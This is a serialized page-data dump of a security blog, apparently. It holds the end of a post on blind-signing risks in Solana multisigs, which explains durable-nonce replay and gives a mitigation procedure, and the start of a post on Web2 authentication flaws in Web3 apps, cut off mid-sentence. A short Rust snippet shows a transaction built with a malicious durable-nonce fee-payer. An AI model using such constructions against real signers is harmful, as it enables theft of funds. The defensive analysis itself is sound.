managed ",{"type":25,"tag":162,"props":72471,"children":72474},{"href":72472,"rel":72473},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/programs/system/src/system_processor.rs#L446",[166],[72475],{"type":31,"value":72476},"by the system program",{"type":31,"value":72478},". They don't have a fixed PDA, so each account can have multiple associated nonces.",{"type":25,"tag":38,"props":72480,"children":72481},{},[72482,72484,72491],{"type":31,"value":72483},"After a durable nonce is used, it'll be \"advanced\" to preventing replay attacks. The new nonce is calculated ",{"type":25,"tag":162,"props":72485,"children":72488},{"href":72486,"rel":72487},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L81",[166],[72489],{"type":31,"value":72490},"based on the current blockhash",{"type":31,"value":72492},", and cannot be predicted in advance.",{"type":25,"tag":206,"props":72494,"children":72496},{"className":6915,"code":72495,"language":6914,"meta":7,"style":7},"    let hash_queue = self.blockhash_queue.read().unwrap();\n    let last_blockhash = hash_queue.last_hash();\n    let next_durable_nonce = DurableNonce::from_blockhash(&last_blockhash);\n",[72497],{"type":25,"tag":82,"props":72498,"children":72499},{"__ignoreMap":7},[72500,72552,72585],{"type":25,"tag":216,"props":72501,"children":72502},{"class":6922,"line":6923},[72503,72507,72511,72515,72519,72523,72528,72532,72536,72540,72544,72548],{"type":25,"tag":216,"props":72504,"children":72505},{"style":6936},[72506],{"type":31,"value":6939},{"type":25,"tag":216,"props":72508,"children":72509},{"style":6947},[72510],{"type":31,"value":72060},{"type":25,"tag":216,"props":72512,"children":72513},{"style":6953},[72514],{"type":31,"value":6956},{"type":25,"tag":216,"props":72516,"children":72517},{"style":6936},[72518],{"type":31,"value":17754},{"type":25,"tag":216,"props":72520,"children":72521},{"style":6953},[72522],{"type":31,"value":179},{"type":25,"tag":216,"props":72524,"children":72525},{"style":6964},[72526],{"type":31,"value":72527},"blockhash_queue",{"type":25,"tag":216,"props":72529,"children":72530},{"style":6953},[72531],{"type":31,"value":179},{"type":25,"tag":216,"props":72533,"children":72534},{"style":7047},[72535],{"type":31,"value":64608},{"type":25,"tag":216,"props":72537,"children":72538},{"style":6964},[72539],{"type":31,"value":17836},{"type":25,"tag":216,"props":72541,"children":72542},{"style":6953},[72543],{"type":31,"value":179},{"type":25,"tag":216,"props":72545,"children":72546},{"style":7047},[72547],{"type":31,"value":7628},{"type":25,"tag":216,"props":72549,"children":72550},{"style":6964},[72551],{"type":31,"value":7633},{"type":25,"tag":216,"props":72553,"children":72554},{"class":6922,"line":6769},[72555,72559,72564,72568,72572,72576,72581],{"type":25,"tag":216,"props":72556,"children":72557},{"style":6936},[72558],{"type":31,"value":6939},{"type":25,"tag":216,"props":72560,"children":72561},{"style":6947},[72562],{"type":31,"value":72563}," last_blockhash",{"type":25,"tag":216,"props":72565,"children":72566},{"style":6953},[72567],{"type":31,"value":6956},{"type":25,"tag":216,"props":72569,"children":72570},{"style":6947},[72571],{"type":31,"value":72060},{"type":25,"tag":216,"props":72573,"children":72574},{"style":6953},[72575],{"type":31,"value":179},{"type":25,"tag":216,"props":72577,"children":72578},{"style":7047},[72579],{"type":31,"value":72580},"last_hash",{"type":25,"tag":216,"props":72582,"children":72583},{"style":6964},[72584],{"type":31,"value":7633},{"type":25,"tag":216,"props":72586,"children":72587},{"class":6922,"line":6778},[72588,72592,72597,72601,72606,72610,72615,72619,72623,72628],{"type":25,"tag":216,"props":72589,"children":72590},{"style":6936},[72591],{"type":31,"value":6939},{"type":25,"tag":216,"props":72593,"children":72594},{"style":6947},[72595],{"type":31,"value":72596}," next_durable_nonce",{"type":25,"tag":216,"props":72598,"children":72599},{"style":6953},[72600],{"type":31,"value":6956},{"type":25,"tag":216,"props":72602,"children":72603},{"style":7375},[72604],{"type":31,"value":72605}," DurableNonce",{"type":25,"tag":216,"props":72607,"children":72608},{"style":6953},[72609],{"type":31,"value":7438},{"type":25,"tag":216,"props":72611,"children":72612},{"style":7047},[72613],{"type":31,"value":72614},"from_blockhash",{"type":25,"tag":216,"props":72616,"children":72617},{"style":6964},[72618],{"type":31,"value":1850},{"type":25,"tag":216,"props":72620,"children":72621},{"style":6953},[72622],{"type":31,"value":7059},{"type":25,"tag":216,"props":72624,"children":72625},{"style":6947},[72626],{"type":31,"value":72627},"last_blockhash",{"type":25,"tag":216,"props":72629,"children":72630},{"style":6964},[72631],{"type":31,"value":7797},{"type":25,"tag":38,"props":72633,"children":72634},{},[72635,72637,72642],{"type":31,"value":72636},"This has an important consequence for our threat model. Unlike recent blockhash transactions, durable nonce transactions ",{"type":25,"tag":64,"props":72638,"children":72639},{},[72640],{"type":31,"value":72641},"can",{"type":31,"value":72643}," be saved and reused.",{"type":25,"tag":26,"props":72645,"children":72647},{"id":72646},"threat-model",[72648],{"type":31,"value":72649},"Threat Model",{"type":25,"tag":38,"props":72651,"children":72652},{},[72653],{"type":31,"value":72654},"Let's consider a simplified form of the original question.",{"type":25,"tag":6711,"props":72656,"children":72657},{},[72658,72663,72668],{"type":25,"tag":2043,"props":72659,"children":72660},{},[72661],{"type":31,"value":72662},"We have a N/M multisig",{"type":25,"tag":2043,"props":72664,"children":72665},{},[72666],{"type":31,"value":72667},"Signers are unable to see what they're signing, both with respect to content and quantity of signatures. This is roughly equivalent to blind signing transactions.",{"type":25,"tag":2043,"props":72669,"children":72670},{},[72671],{"type":31,"value":72672},"We can accurately query chain state.",{"type":25,"tag":38,"props":72674,"children":72675},{},[72676],{"type":31,"value":72677},"Can we safely sign transactions?",{"type":25,"tag":38,"props":72679,"children":72680},{},[72681],{"type":31,"value":72682},"One observation is that this problem is very hard to solve with durable nonces. By signing durable nonce transactions, an attacker could collect signatures and replay them at some indeterminite future point.",{"type":25,"tag":38,"props":72684,"children":72685},{},[72686,72688,72694,72696,72703],{"type":31,"value":72687},"Durable nonces require an onchain account, and it's possible to use a ",{"type":25,"tag":82,"props":72689,"children":72691},{"className":72690},[],[72692],{"type":31,"value":72693},"getProgramAccounts",{"type":31,"value":72695}," call to validate if your signer ",{"type":25,"tag":162,"props":72697,"children":72700},{"href":72698,"rel":72699},"https://solana.stackexchange.com/questions/9650/is-there-any-way-to-get-nonce-accounts-of-an-authorized-account",[166],[72701],{"type":31,"value":72702},"has an associated durable nonce",{"type":31,"value":179},{"type":25,"tag":206,"props":72705,"children":72707},{"className":39893,"code":72706,"language":39895,"meta":7,"style":7},"const connection = new Connection(clusterApiUrl('testnet'));\nconst nonceAccounts = await connection.getProgramAccounts(\n  // The system program owns all nonce accounts.\n  SYSTEM_PROGRAM_ADDRESS,\n  {\n    filters: [\n      {\n        // Nonce accounts are exactly 80 bytes long\n        dataSize: 80,\n      },\n      {\n        // The authority's 32-byte public key is written\n        // into bytes 8-40 of the nonce's account data.\n        memcmp: {\n          bytes: AUTHORITY_PUBLIC_KEY.toBase58(),\n          offset: 8,\n        },\n      },\n    ],\n  }\n);\n",[72708],{"type":25,"tag":82,"props":72709,"children":72710},{"__ignoreMap":7},[72711,72758,72794,72802,72814,72822,72834,72842,72850,72867,72874,72881,72889,72897,72909,72935,72952,72959,72966,72974,72981],{"type":25,"tag":216,"props":72712,"children":72713},{"class":6922,"line":6923},[72714,72718,72723,72727,72731,72736,72740,72745,72749,72754],{"type":25,"tag":216,"props":72715,"children":72716},{"style":6936},[72717],{"type":31,"value":13611},{"type":25,"tag":216,"props":72719,"children":72720},{"style":6947},[72721],{"type":31,"value":72722}," connection",{"type":25,"tag":216,"props":72724,"children":72725},{"style":6953},[72726],{"type":31,"value":6956},{"type":25,"tag":216,"props":72728,"children":72729},{"style":6936},[72730],{"type":31,"value":35895},{"type":25,"tag":216,"props":72732,"children":72733},{"style":7047},[72734],{"type":31,"value":72735}," Connection",{"type":25,"tag":216,"props":72737,"children":72738},{"style":6964},[72739],{"type":31,"value":1850},{"type":25,"tag":216,"props":72741,"children":72742},{"style":7047},[72743],{"type":31,"value":72744},"clusterApiUrl",{"type":25,"tag":216,"props":72746,"children":72747},{"style":6964},[72748],{"type":31,"value":1850},{"type":25,"tag":216,"props":72750,"children":72751},{"style":8205},[72752],{"type":31,"value":72753},"'testnet'",{"type":25,"tag":216,"props":72755,"children":72756},{"style":6964},[72757],{"type":31,"value":11175},{"type":25,"tag":216,"props":72759,"children":72760},{"class":6922,"line":6769},[72761,72765,72770,72774,72778,72782,72786,72790],{"type":25,"tag":216,"props":72762,"children":72763},{"style":6936},[72764],{"type":31,"value":13611},{"type":25,"tag":216,"props":72766,"children":72767},{"style":6947},[72768],{"type":31,"value":72769}," nonceAccounts",{"type":25,"tag":216,"props":72771,"children":72772},{"style":6953},[72773],{"type":31,"value":6956},{"type":25,"tag":216,"props":72775,"children":72776},{"style":6973},[72777],{"type":31,"value":40174},{"type":25,"tag":216,"props":72779,"children":72780},{"style":6947},[72781],{"type":31,"value":72722},{"type":25,"tag":216,"props":72783,"children":72784},{"style":6964},[72785],{"type":31,"value":179},{"type":25,"tag":216,"props":72787,"children":72788},{"style":7047},[72789],{"type":31,"value":72693},{"type":25,"tag":216,"props":72791,"children":72792},{"style":6964},[72793],{"type":31,"value":7420},{"type":25,"tag":216,"props":72795,"children":72796},{"class":6922,"line":6778},[72797],{"type":25,"tag":216,"props":72798,"children":72799},{"style":6927},[72800],{"type":31,"value":72801},"  // The system program owns all nonce accounts.\n",{"type":25,"tag":216,"props":72803,"children":72804},{"class":6922,"line":7005},[72805,72810],{"type":25,"tag":216,"props":72806,"children":72807},{"style":6947},[72808],{"type":31,"value":72809},"  SYSTEM_PROGRAM_ADDRESS",{"type":25,"tag":216,"props":72811,"children":72812},{"style":6964},[72813],{"type":31,"value":7465},{"type":25,"tag":216,"props":72815,"children":72816},{"class":6922,"line":7110},[72817],{"type":25,"tag":216,"props":72818,"children":72819},{"style":6964},[72820],{"type":31,"value":72821},"  {\n",{"type":25,"tag":216,"props":72823,"children":72824},{"class":6922,"line":7216},[72825,72830],{"type":25,"tag":216,"props":72826,"children":72827},{"style":6947},[72828],{"type":31,"value":72829},"    filters:",{"type":25,"tag":216,"props":72831,"children":72832},{"style":6964},[72833],{"type":31,"value":29579},{"type":25,"tag":216,"props":72835,"children":72836},{"class":6922,"line":7244},[72837],{"type":25,"tag":216,"props":72838,"children":72839},{"style":6964},[72840],{"type":31,"value":72841},"      {\n",{"type":25,"tag":216,"props":72843,"children":72844},{"class":6922,"line":7257},[72845],{"type":25,"tag":216,"props":72846,"children":72847},{"style":6927},[72848],{"type":31,"value":72849},"        // Nonce accounts are exactly 80 bytes long\n",{"type":25,"tag":216,"props":72851,"children":72852},{"class":6922,"line":7275},[72853,72858,72863],{"type":25,"tag":216,"props":72854,"children":72855},{"style":6947},[72856],{"type":31,"value":72857},"        dataSize:",{"type":25,"tag":216,"props":72859,"children":72860},{"style":6989},[72861],{"type":31,"value":72862}," 80",{"type":25,"tag":216,"props":72864,"children":72865},{"style":6964},[72866],{"type":31,"value":7465},{"type":25,"tag":216,"props":72868,"children":72869},{"class":6922,"line":7296},[72870],{"type":25,"tag":216,"props":72871,"children":72872},{"style":6964},[72873],{"type":31,"value":41162},{"type":25,"tag":216,"props":72875,"children":72876},{"class":6922,"line":7305},[72877],{"type":25,"tag":216,"props":72878,"children":72879},{"style":6964},[72880],{"type":31,"value":72841},{"type":25,"tag":216,"props":72882,"children":72883},{"class":6922,"line":7557},[72884],{"type":25,"tag":216,"props":72885,"children":72886},{"style":6927},[72887],{"type":31,"value":72888},"        // The authority's 32-byte public key is written\n",{"type":25,"tag":216,"props":72890,"children":72891},{"class":6922,"line":7574},[72892],{"type":25,"tag":216,"props":72893,"children":72894},{"style":6927},[72895],{"type":31,"value":72896},"        // into bytes 8-40 of the nonce's account data.\n",{"type":25,"tag":216,"props":72898,"children":72899},{"class":6922,"line":7591},[72900,72905],{"type":25,"tag":216,"props":72901,"children":72902},{"style":6947},[72903],{"type":31,"value":72904},"        memcmp:",{"type":25,"tag":216,"props":72906,"children":72907},{"style":6964},[72908],{"type":31,"value":7241},{"type":25,"tag":216,"props":72910,"children":72911},{"class":6922,"line":7604},[72912,72917,72922,72926,72931],{"type":25,"tag":216,"props":72913,"children":72914},{"style":6947},[72915],{"type":31,"value":72916},"          bytes:",{"type":25,"tag":216,"props":72918,"children":72919},{"style":6947},[72920],{"type":31,"value":72921}," AUTHORITY_PUBLIC_KEY",{"type":25,"tag":216,"props":72923,"children":72924},{"style":6964},[72925],{"type":31,"value":179},{"type":25,"tag":216,"props":72927,"children":72928},{"style":7047},[72929],{"type":31,"value":72930},"toBase58",{"type":25,"tag":216,"props":72932,"children":72933},{"style":6964},[72934],{"type":31,"value":7448},{"type":25,"tag":216,"props":72936,"children":72937},{"class":6922,"line":7613},[72938,72943,72948],{"type":25,"tag":216,"props":72939,"children":72940},{"style":6947},[72941],{"type":31,"value":72942},"          offset:",{"type":25,"tag":216,"props":72944,"children":72945},{"style":6989},[72946],{"type":31,"value":72947}," 8",{"type":25,"tag":216,"props":72949,"children":72950},{"style":6964},[72951],{"type":31,"value":7465},{"type":25,"tag":216,"props":72953,"children":72954},{"class":6922,"line":7636},[72955],{"type":25,"tag":216,"props":72956,"children":72957},{"style":6964},[72958],{"type":31,"value":29331},{"type":25,"tag":216,"props":72960,"children":72961},{"class":6922,"line":7645},[72962],{"type":25,"tag":216,"props":72963,"children":72964},{"style":6964},[72965],{"type":31,"value":41162},{"type":25,"tag":216,"props":72967,"children":72968},{"class":6922,"line":7654},[72969],{"type":25,"tag":216,"props":72970,"children":72971},{"style":6964},[72972],{"type":31,"value":72973},"    ],\n",{"type":25,"tag":216,"props":72975,"children":72976},{"class":6922,"line":7722},[72977],{"type":25,"tag":216,"props":72978,"children":72979},{"style":6964},[72980],{"type":31,"value":9823},{"type":25,"tag":216,"props":72982,"children":72983},{"class":6922,"line":7730},[72984],{"type":25,"tag":216,"props":72985,"children":72986},{"style":6964},[72987],{"type":31,"value":7797},{"type":25,"tag":38,"props":72989,"children":72990},{},[72991,72993,73001],{"type":31,"value":72992},"Unfortunately this is not sufficient",{"type":25,"tag":19431,"props":72994,"children":72995},{},[72996],{"type":25,"tag":162,"props":72997,"children":72999},{"href":33584,"ariaDescribedBy":72998,"dataFootnoteRef":7,"id":33586},[19438],[73000],{"type":31,"value":184},{"type":31,"value":73002},". A transaction may have multiple signers, and an attacker could use their own durable nonce fee-payer. This means our problem as defined above is unfortunately unsolvable.",{"type":25,"tag":206,"props":73004,"children":73006},{"className":6915,"code":73005,"language":6914,"meta":7,"style":7},"    let instruction = system_instruction::transfer(&from, &ledger_base_pubkey, 42);\n    let message =\n        Message::new_with_nonce(vec![instruction], Some(&evil_nonce_authority), &nonce_account, &evil_nonce_authority)\n            .serialize();\n",[73007],{"type":25,"tag":82,"props":73008,"children":73009},{"__ignoreMap":7},[73010,73076,73092,73175],{"type":25,"tag":216,"props":73011,"children":73012},{"class":6922,"line":6923},[73013,73017,73021,73025,73030,73034,73038,73042,73046,73050,73054,73058,73063,73067,73072],{"type":25,"tag":216,"props":73014,"children":73015},{"style":6936},[73016],{"type":31,"value":6939},{"type":25,"tag":216,"props":73018,"children":73019},{"style":6947},[73020],{"type":31,"value":47336},{"type":25,"tag":216,"props":73022,"children":73023},{"style":6953},[73024],{"type":31,"value":6956},{"type":25,"tag":216,"props":73026,"children":73027},{"style":6964},[73028],{"type":31,"value":73029}," system_instruction",{"type":25,"tag":216,"props":73031,"children":73032},{"style":6953},[73033],{"type":31,"value":7438},{"type":25,"tag":216,"props":73035,"children":73036},{"style":7047},[73037],{"type":31,"value":36085},{"type":25,"tag":216,"props":73039,"children":73040},{"style":6964},[73041],{"type":31,"value":1850},{"type":25,"tag":216,"props":73043,"children":73044},{"style":6953},[73045],{"type":31,"value":7059},{"type":25,"tag":216,"props":73047,"children":73048},{"style":6947},[73049],{"type":31,"value":23433},{"type":25,"tag":216,"props":73051,"children":73052},{"style":6964},[73053],{"type":31,"value":7026},{"type":25,"tag":216,"props":73055,"children":73056},{"style":6953},[73057],{"type":31,"value":7059},{"type":25,"tag":216,"props":73059,"children":73060},{"style":6947},[73061],{"type":31,"value":73062},"ledger_base_pubkey",{"type":25,"tag":216,"props":73064,"children":73065},{"style":6964},[73066],{"type":31,"value":7026},{"type":25,"tag":216,"props":73068,"children":73069},{"style":6989},[73070],{"type":31,"value":73071},"42",{"type":25,"tag":216,"props":73073,"children":73074},{"style":6964},[73075],{"type":31,"value":7797},{"type":25,"tag":216,"props":73077,"children":73078},{"class":6922,"line":6769},[73079,73083,73088],{"type":25,"tag":216,"props":73080,"children":73081},{"style":6936},[73082],{"type":31,"value":6939},{"type":25,"tag":216,"props":73084,"children":73085},{"style":6947},[73086],{"type":31,"value":73087}," message",{"type":25,"tag":216,"props":73089,"children":73090},{"style":6953},[73091],{"type":31,"value":39818},{"type":25,"tag":216,"props":73093,"children":73094},{"class":6922,"line":6778},[73095,73100,73104,73109,73113,73117,73121,73125,73129,73133,73137,73141,73146,73150,73154,73159,73163,73167,73171],{"type":25,"tag":216,"props":73096,"children":73097},{"style":7375},[73098],{"type":31,"value":73099},"        Message",{"type":25,"tag":216,"props":73101,"children":73102},{"style":6953},[73103],{"type":31,"value":7438},{"type":25,"tag":216,"props":73105,"children":73106},{"style":7047},[73107],{"type":31,"value":73108},"new_with_nonce",{"type":25,"tag":216,"props":73110,"children":73111},{"style":6964},[73112],{"type":31,"value":1850},{"type":25,"tag":216,"props":73114,"children":73115},{"style":7047},[73116],{"type":31,"value":7849},{"type":25,"tag":216,"props":73118,"children":73119},{"style":6964},[73120],{"type":31,"value":7701},{"type":25,"tag":216,"props":73122,"children":73123},{"style":6947},[73124],{"type":31,"value":47646},{"type":25,"tag":216,"props":73126,"children":73127},{"style":6964},[73128],{"type":31,"value":27006},{"type":25,"tag":216,"props":73130,"children":73131},{"style":7375},[73132],{"type":31,"value":45985},{"type":25,"tag":216,"props":73134,"children":73135},{"style":6964},[73136],{"type":31,"value":1850},{"type":25,"tag":216,"props":73138,"children":73139},{"style":6953},[73140],{"type":31,"value":7059},{"type":25,"tag":216,"props":73142,"children":73143},{"style":6947},[73144],{"type":31,"value":73145},"evil_nonce_authority",{"type":25,"tag":216,"props":73147,"children":73148},{"style":6964},[73149],{"type":31,"value":5406},{"type":25,"tag":216,"props":73151,"children":73152},{"style":6953},[73153],{"type":31,"value":7059},{"type":25,"tag":216,"props":73155,"children":73156},{"style":6947},[73157],{"type":31,"value":73158},"nonce_account",{"type":25,"tag":216,"props":73160,"children":73161},{"style":6964},[73162],{"type":31,"value":7026},{"type":25,"tag":216,"props":73164,"children":73165},{"style":6953},[73166],{"type":31,"value":7059},{"type":25,"tag":216,"props":73168,"children":73169},{"style":6947},[73170],{"type":31,"value":73145},{"type":25,"tag":216,"props":73172,"children":73173},{"style":6964},[73174],{"type":31,"value":7107},{"type":25,"tag":216,"props":73176,"children":73177},{"class":6922,"line":7005},[73178,73182,73187],{"type":25,"tag":216,"props":73179,"children":73180},{"style":6953},[73181],{"type":31,"value":7116},{"type":25,"tag":216,"props":73183,"children":73184},{"style":7047},[73185],{"type":31,"value":73186},"serialize",{"type":25,"tag":216,"props":73188,"children":73189},{"style":6964},[73190],{"type":31,"value":7633},{"type":25,"tag":38,"props":73192,"children":73193},{},[73194,73196,73203],{"type":31,"value":73195},"Luckily, it is tractable with a small modification. What if the signer is allowed to observe the fee-payer on the transaction? For example, Ledger ",{"type":25,"tag":162,"props":73197,"children":73200},{"href":73198,"rel":73199},"https://github.com/LedgerHQ/app-solana/blob/a19da6c301541390bd08731a10f1f128b38ee66e/src/handle_sign_message.c#L97",[166],[73201],{"type":31,"value":73202},"logs the fee-payer here",{"type":31,"value":179},{"type":25,"tag":206,"props":73205,"children":73207},{"className":20473,"code":73206,"language":2254,"meta":7,"style":7},"bool print_config_show_authority(const PrintConfig* print_config, const Pubkey* authority) {\n    return print_config->expert_mode || !pubkeys_equal(print_config->signer_pubkey, authority);\n}\n",[73208],{"type":25,"tag":82,"props":73209,"children":73210},{"__ignoreMap":7},[73211,73270,73326],{"type":25,"tag":216,"props":73212,"children":73213},{"class":6922,"line":6923},[73214,73218,73223,73227,73231,73236,73240,73245,73249,73253,73257,73261,73266],{"type":25,"tag":216,"props":73215,"children":73216},{"style":6936},[73217],{"type":31,"value":33646},{"type":25,"tag":216,"props":73219,"children":73220},{"style":7047},[73221],{"type":31,"value":73222}," print_config_show_authority",{"type":25,"tag":216,"props":73224,"children":73225},{"style":6964},[73226],{"type":31,"value":1850},{"type":25,"tag":216,"props":73228,"children":73229},{"style":6936},[73230],{"type":31,"value":13611},{"type":25,"tag":216,"props":73232,"children":73233},{"style":6964},[73234],{"type":31,"value":73235}," PrintConfig",{"type":25,"tag":216,"props":73237,"children":73238},{"style":6953},[73239],{"type":31,"value":8519},{"type":25,"tag":216,"props":73241,"children":73242},{"style":6947},[73243],{"type":31,"value":73244}," print_config",{"type":25,"tag":216,"props":73246,"children":73247},{"style":6964},[73248],{"type":31,"value":7026},{"type":25,"tag":216,"props":73250,"children":73251},{"style":6936},[73252],{"type":31,"value":13611},{"type":25,"tag":216,"props":73254,"children":73255},{"style":6964},[73256],{"type":31,"value":24817},{"type":25,"tag":216,"props":73258,"children":73259},{"style":6953},[73260],{"type":31,"value":8519},{"type":25,"tag":216,"props":73262,"children":73263},{"style":6947},[73264],{"type":31,"value":73265}," authority",{"type":25,"tag":216,"props":73267,"children":73268},{"style":6964},[73269],{"type":31,"value":18761},{"type":25,"tag":216,"props":73271,"children":73272},{"class":6922,"line":6769},[73273,73277,73281,73285,73290,73294,73298,73303,73307,73312,73316,73321],{"type":25,"tag":216,"props":73274,"children":73275},{"style":6973},[73276],{"type":31,"value":20947},{"type":25,"tag":216,"props":73278,"children":73279},{"style":6947},[73280],{"type":31,"value":73244},{"type":25,"tag":216,"props":73282,"children":73283},{"style":6964},[73284],{"type":31,"value":17714},{"type":25,"tag":216,"props":73286,"children":73287},{"style":6947},[73288],{"type":31,"value":73289},"expert_mode",{"type":25,"tag":216,"props":73291,"children":73292},{"style":6953},[73293],{"type":31,"value":27654},{"type":25,"tag":216,"props":73295,"children":73296},{"style":6953},[73297],{"type":31,"value":16820},{"type":25,"tag":216,"props":73299,"children":73300},{"style":7047},[73301],{"type":31,"value":73302},"pubkeys_equal",{"type":25,"tag":216,"props":73304,"children":73305},{"style":6964},[73306],{"type":31,"value":1850},{"type":25,"tag":216,"props":73308,"children":73309},{"style":6947},[73310],{"type":31,"value":73311},"print_config",{"type":25,"tag":216,"props":73313,"children":73314},{"style":6964},[73315],{"type":31,"value":17714},{"type":25,"tag":216,"props":73317,"children":73318},{"style":6947},[73319],{"type":31,"value":73320},"signer_pubkey",{"type":25,"tag":216,"props":73322,"children":73323},{"style":6964},[73324],{"type":31,"value":73325},", authority);\n",{"type":25,"tag":216,"props":73327,"children":73328},{"class":6922,"line":6778},[73329],{"type":25,"tag":216,"props":73330,"children":73331},{"style":6964},[73332],{"type":31,"value":7874},{"type":25,"tag":38,"props":73334,"children":73335},{},[73336],{"type":31,"value":73337},"Let's say we've determined our signer has no associated nonce accounts. If our pubkey is the fee-payer on the new proposed transaction, we can know for sure that the transaction does not use durable nonces!",{"type":25,"tag":38,"props":73339,"children":73340},{},[73341],{"type":31,"value":73342},"Without durable nonces, the problem becomes much easier to solve. After waiting enough time, there'll be a point where all previously signed transactions will be expired. If we see no unexpected transactions, that means we're safe.",{"type":25,"tag":38,"props":73344,"children":73345},{},[73346],{"type":31,"value":73347},"We can then use the following procedure.",{"type":25,"tag":6711,"props":73349,"children":73350},{},[73351,73356,73361,73366,73371],{"type":25,"tag":2043,"props":73352,"children":73353},{},[73354],{"type":31,"value":73355},"Ensure all signers have no durable nonce accounts.",{"type":25,"tag":2043,"props":73357,"children":73358},{},[73359],{"type":31,"value":73360},"The first signer signs and submits the transaction.",{"type":25,"tag":2043,"props":73362,"children":73363},{},[73364],{"type":31,"value":73365},"Wait two minutes for all recent blockhashes to expire.",{"type":25,"tag":2043,"props":73367,"children":73368},{},[73369],{"type":31,"value":73370},"Observe recent transactions associated with the signer to ensure nothing unexpected is submitted.",{"type":25,"tag":2043,"props":73372,"children":73373},{},[73374],{"type":31,"value":73375},"Repeat steps 2 to 4 for each signer",{"type":25,"tag":26,"props":73377,"children":73379},{"id":73378},"beyond",[73380],{"type":31,"value":73381},"Beyond",{"type":25,"tag":38,"props":73383,"children":73384},{},[73385],{"type":31,"value":73386},"Solana's signature model is unique. What can protocols do if they're deploying on blockchains without these unique properties? The most important constraint is observability. There must be a way you can see what you're signing, either while signing or implicitly after the fact.",{"type":25,"tag":38,"props":73388,"children":73389},{},[73390,73392,73399],{"type":31,"value":73391},"For example, pcaversaccio wrote a tool to ",{"type":25,"tag":162,"props":73393,"children":73396},{"href":73394,"rel":73395},"https://github.com/pcaversaccio/safe-tx-hashes-util",[166],[73397],{"type":31,"value":73398},"validate Safe transaction hashes",{"type":31,"value":73400},". As the space matures, we hope more open source tooling will come to light.",{"type":25,"tag":22381,"props":73402,"children":73404},{"className":73403,"dataFootnotes":7},[22384],[73405,73410],{"type":25,"tag":26,"props":73406,"children":73408},{"className":73407,"id":19438},[22389],[73409],{"type":31,"value":22392},{"type":25,"tag":6711,"props":73411,"children":73412},{},[73413],{"type":25,"tag":2043,"props":73414,"children":73415},{"id":34327},[73416,73418,73426,73428],{"type":31,"value":73417},"The original version of this blog post did not consider a malicious fee-payer. Thanks to ",{"type":25,"tag":162,"props":73419,"children":73423},{"href":73420,"rel":73421,":style":73422},"https://twitter.com/PierreArowana",[166],"color: #B1D0EE; text-decoration: underline;",[73424],{"type":31,"value":73425},"@PierreArowana",{"type":31,"value":73427}," for pointing this out to me. ",{"type":25,"tag":162,"props":73429,"children":73431},{"href":34355,"ariaLabel":22495,"className":73430,"dataFootnoteBackref":7},[22497],[73432],{"type":31,"value":22500},{"type":25,"tag":9316,"props":73434,"children":73435},{},[73436],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":73438},[73439,73443,73444,73445],{"id":71635,"depth":6769,"text":71638,"children":73440},[73441,73442],{"id":71646,"depth":6778,"text":71649},{"id":71925,"depth":6778,"text":71928},{"id":72646,"depth":6769,"text":72649},{"id":73378,"depth":6769,"text":73381},{"id":19438,"depth":6769,"text":22392},"content:blog:2025-02-22-multisig-security.md","blog/2025-02-22-multisig-security.md","blog/2025-02-22-multisig-security",{"_path":73450,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":73451,"description":73452,"date":73453,"author":73454,"image":73455,"isFeatured":16,"onBlogPage":16,"tags":73457,"body":73458,"_type":6798,"_id":75156,"_source":6800,"_file":75157,"_stem":75158,"_extension":6803},"/blog/2025-03-07-subverting-web2-authentication-in-web3","Subverting Web2 Authentication in Web3","Web3 authentication uses cryptographic signatures and wallets, but Web2 auth integrations can introduce hidden risks. We explore vulnerabilities like OAuth logic exploits, Supabase misconfigurations, and OAuth abuse in localhost setups.","2025-03-07",[35163,35162],{"src":73456},"/posts/web2-in-web3/title.jpg",[36103],{"type":22,"children":73459,"toc":75138},[73460,73465,73470,73475,73501,73507,73512,73518,73539,73545,73550,73557,73570,73600,73606,73650,73657,73663,73696,73717,73725,73744,73751,73756,73762,73767,73772,73797,73802,73808,73814,73835,73841,73868,73896,73903,73908,73913,74258,74262,74284,74290,74311,74325,74338,74343,74359,74364,75093,75098,75103,75108,75120,75124,75129,75134],{"type":25,"tag":38,"props":73461,"children":73462},{},[73463],{"type":31,"value":73464},"Authentication serves as a cornerstone of secure interactions in Web3, enabling access control, user identity verification, and transaction integrity. Unlike traditional Web2 systems, which often rely on centralized databases and password-based mechanisms, Web3 systems adopt decentralized identifiers (DIDs), cryptographic signatures, and wallet-based authentication. However, there are many applications that still use Web2-based authentication providers to improve the user experience.",{"type":25,"tag":38,"props":73466,"children":73467},{},[73468],{"type":31,"value":73469},"In our research, we focused on Web3 applications that rely on Web2-based authentication methods. Specifically, we analyzed the authentication flows of these applications and identified a lesser-known class of vulnerabilities.",{"type":25,"tag":38,"props":73471,"children":73472},{},[73473],{"type":31,"value":73474},"In this article, we will discuss three cases we discovered:",{"type":25,"tag":6711,"props":73476,"children":73477},{},[73478,73483,73496],{"type":25,"tag":2043,"props":73479,"children":73480},{},[73481],{"type":31,"value":73482},"OAuth Logic Vulnerability on an Authentication Provider",{"type":25,"tag":2043,"props":73484,"children":73485},{},[73486,73488,73494],{"type":31,"value":73487},"Supabase ",{"type":25,"tag":82,"props":73489,"children":73491},{"className":73490},[],[73492],{"type":31,"value":73493},"user_metadata",{"type":31,"value":73495}," misconfiguration",{"type":25,"tag":2043,"props":73497,"children":73498},{},[73499],{"type":31,"value":73500},"OAuth abuse in localhost development environment",{"type":25,"tag":26,"props":73502,"children":73504},{"id":73503},"abusing-oauth-authentication-logic",[73505],{"type":31,"value":73506},"Abusing OAuth Authentication Logic",{"type":25,"tag":38,"props":73508,"children":73509},{},[73510],{"type":31,"value":73511},"During our research, we initially identified some bugs in applications. However, these were mostly simple and well-known issues, so we decided to focus on vulnerabilities within authentication providers themselves.",{"type":25,"tag":606,"props":73513,"children":73515},{"id":73514},"web3auth-introduction",[73516],{"type":31,"value":73517},"Web3Auth Introduction",{"type":25,"tag":38,"props":73519,"children":73520},{},[73521,73528,73530,73537],{"type":25,"tag":162,"props":73522,"children":73525},{"href":73523,"rel":73524},"https://web3auth.io/",[166],[73526],{"type":31,"value":73527},"Web3Auth",{"type":31,"value":73529}," is a tool designed to simplify the login process for Web3 applications, eliminating the need for users to manage complex wallet setups or memorize lengthy passwords. One of its products, Web3Auth PnP (Plug and Play), supports 